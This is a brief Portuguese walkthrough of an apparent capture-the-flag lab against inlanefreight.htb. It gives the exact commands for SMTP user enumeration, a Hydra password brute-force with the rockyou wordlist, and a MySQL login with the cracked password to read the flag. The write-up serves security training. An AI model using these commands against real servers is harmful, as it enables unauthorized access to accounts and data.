Attacking Common Services - Easy

1. Você está mirando o domínio inlanefreight.htb. Avalie o servidor alvo e obtenha o conteúdo do arquivo flag.txt. Envie-o como resposta.

Enumeração

• Nmap

• Enumerando o smtp descobrimos que existe um email

smtp-user-enum -M RCPT -U users.list -D inlanefreight.htb -t 10.129.233.238

• Após descobrir o email vamos tentar quebrá-lo usando a ferramenta hydra

hydra -l fiona@inlanefreight.htb -P /usr/share/wordlists/rockyou.txt 10.129.233.238 smtp -t 64

• Tentamos login no smtp mas não deu certo, então tentamos fazer login com as credenciais encontradas no servidor mysql e lemos a flag

mysql -u fiona -p987654321 -h 10.129.233.238